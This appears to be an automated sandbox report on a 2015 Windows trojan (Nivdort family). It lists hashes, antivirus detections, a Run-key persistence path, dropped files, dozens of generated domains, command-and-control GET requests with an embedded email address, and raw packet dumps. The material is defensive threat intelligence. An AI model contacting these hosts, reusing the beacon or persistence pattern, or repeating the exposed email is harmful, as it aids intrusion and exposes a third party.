Analysis Date2015-08-26 14:30:58
MD5609e100a3489b339e23395f5b60c7254
SHA138d79e2c4f1553d5db3a5bf5f4971e841cbc6742

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: db439359beee13e7f2d532c223200aad sha1: 7136aacabb51205a151953f90084d8e814676ed5 size: 295424
Section.rdata md5: 21894ebffe36ef048d519afa9169de62 sha1: 6144d4343511d3867e7b41b2bd3d6dd63c070e01 size: 35328
Section.data md5: ecdbb142a426865619aef5574064d781 sha1: 474ad465df96c620293202d8a7fc58bb435df9d0 size: 105472
Timestamp2014-10-30 10:05:03
PackerMicrosoft Visual C++ ?.?
PEhashc055109dae58953e59b7a07d3161db90b41172ed
IMPhash064b4ce7b93be0d303ea2ce45ffd36b0
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader15.31024
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!Trojan.Agent.Win32.546240
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Downloader-TLD [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterno_virus
AVAvira (antivir)TR/Crypt.Xpack.258592
AVMcafeeTrojan-FEMT!609E100A3489
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Link Storage Spooler SNMP Provider ➝
C:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\jpddabpw.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\jpddabpw.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\jpddabpw.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\jpddabpw.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\jpddabpw.gicuj
Creates FileC:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\dmwjgxrgcwx.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\jpddabpw.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ayitqvjubsdr\jpddabpw.exe"

Network Details:

DNSmountainschool.net
Type: A
184.168.221.15
DNSwindowwhile.net
Type: A
95.211.230.75
DNSwinterschool.net
Type: A
82.98.134.9
DNSfinishschool.net
Type: A
208.73.211.70
DNSpossibletraining.net
Type: A
50.63.202.54
DNSsimplequestion.net
Type: A
DNSmotherquestion.net
Type: A
DNSsimpletherefore.net
Type: A
DNSmothertherefore.net
Type: A
DNSpossibleschool.net
Type: A
DNSmountainwhile.net
Type: A
DNSpossiblewhile.net
Type: A
DNSmountainquestion.net
Type: A
DNSpossiblequestion.net
Type: A
DNSmountaintherefore.net
Type: A
DNSpossibletherefore.net
Type: A
DNSperhapsschool.net
Type: A
DNSwindowschool.net
Type: A
DNSperhapswhile.net
Type: A
DNSperhapsquestion.net
Type: A
DNSwindowquestion.net
Type: A
DNSperhapstherefore.net
Type: A
DNSwindowtherefore.net
Type: A
DNSsubjectschool.net
Type: A
DNSwinterwhile.net
Type: A
DNSsubjectwhile.net
Type: A
DNSwinterquestion.net
Type: A
DNSsubjectquestion.net
Type: A
DNSwintertherefore.net
Type: A
DNSsubjecttherefore.net
Type: A
DNSleaveschool.net
Type: A
DNSfinishwhile.net
Type: A
DNSleavewhile.net
Type: A
DNSfinishquestion.net
Type: A
DNSleavequestion.net
Type: A
DNSfinishtherefore.net
Type: A
DNSleavetherefore.net
Type: A
DNSsweetschool.net
Type: A
DNSprobablyschool.net
Type: A
DNSsweetwhile.net
Type: A
DNSprobablywhile.net
Type: A
DNSsweetquestion.net
Type: A
DNSprobablyquestion.net
Type: A
DNSsweettherefore.net
Type: A
DNSprobablytherefore.net
Type: A
DNSseveralschool.net
Type: A
DNSmaterialschool.net
Type: A
DNSseveralwhile.net
Type: A
DNSmaterialwhile.net
Type: A
DNSseveralquestion.net
Type: A
DNSmaterialquestion.net
Type: A
DNSseveraltherefore.net
Type: A
DNSmaterialtherefore.net
Type: A
DNSseverahunger.net
Type: A
DNSlaughhunger.net
Type: A
DNSseveratraining.net
Type: A
DNSlaughtraining.net
Type: A
DNSseverastorm.net
Type: A
DNSlaughstorm.net
Type: A
DNSseverathrown.net
Type: A
DNSlaughthrown.net
Type: A
DNSsimplehunger.net
Type: A
DNSmotherhunger.net
Type: A
DNSsimpletraining.net
Type: A
DNSmothertraining.net
Type: A
DNSsimplestorm.net
Type: A
DNSmotherstorm.net
Type: A
DNSsimplethrown.net
Type: A
DNSmotherthrown.net
Type: A
DNSmountainhunger.net
Type: A
DNSpossiblehunger.net
Type: A
DNSmountaintraining.net
Type: A
DNSmountainstorm.net
Type: A
DNSpossiblestorm.net
Type: A
DNSmountainthrown.net
Type: A
DNSpossiblethrown.net
Type: A
DNSperhapshunger.net
Type: A
DNSwindowhunger.net
Type: A
DNSperhapstraining.net
Type: A
DNSwindowtraining.net
Type: A
DNSperhapsstorm.net
Type: A
DNSwindowstorm.net
Type: A
DNSperhapsthrown.net
Type: A
DNSwindowthrown.net
Type: A
DNSwinterhunger.net
Type: A
HTTP GEThttp://mountainschool.net/index.php?email=suyanxian@shanghaidaily.com&method=post&len
User-Agent:
HTTP GEThttp://windowwhile.net/index.php?email=suyanxian@shanghaidaily.com&method=post&len
User-Agent:
HTTP GEThttp://winterschool.net/index.php?email=suyanxian@shanghaidaily.com&method=post&len
User-Agent:
HTTP GEThttp://finishschool.net/index.php?email=suyanxian@shanghaidaily.com&method=post&len
User-Agent:
HTTP GEThttp://possibletraining.net/index.php?email=suyanxian@shanghaidaily.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 184.168.221.15:80
Flows TCP192.168.1.1:1032 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1033 ➝ 82.98.134.9:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.70:80
Flows TCP192.168.1.1:1035 ➝ 50.63.202.54:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737579 616e7869 616e4073   mail=suyanxian@s
0x00000020 (00032)   68616e67 68616964 61696c79 2e636f6d   hanghaidaily.com
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   206d6f75 6e746169 6e736368 6f6f6c2e    mountainschool.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737579 616e7869 616e4073   mail=suyanxian@s
0x00000020 (00032)   68616e67 68616964 61696c79 2e636f6d   hanghaidaily.com
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   2077696e 646f7777 68696c65 2e6e6574    windowwhile.net
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737579 616e7869 616e4073   mail=suyanxian@s
0x00000020 (00032)   68616e67 68616964 61696c79 2e636f6d   hanghaidaily.com
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   2077696e 74657273 63686f6f 6c2e6e65    winterschool.ne
0x00000080 (00128)   740d0a0d 0a0d0a                       t......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737579 616e7869 616e4073   mail=suyanxian@s
0x00000020 (00032)   68616e67 68616964 61696c79 2e636f6d   hanghaidaily.com
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   2066696e 69736873 63686f6f 6c2e6e65    finishschool.ne
0x00000080 (00128)   740d0a0d 0a0d0a                       t......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737579 616e7869 616e4073   mail=suyanxian@s
0x00000020 (00032)   68616e67 68616964 61696c79 2e636f6d   hanghaidaily.com
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20706f73 7369626c 65747261 696e696e    possibletrainin
0x00000080 (00128)   672e6e65 740d0a0d 0a                  g.net....


Strings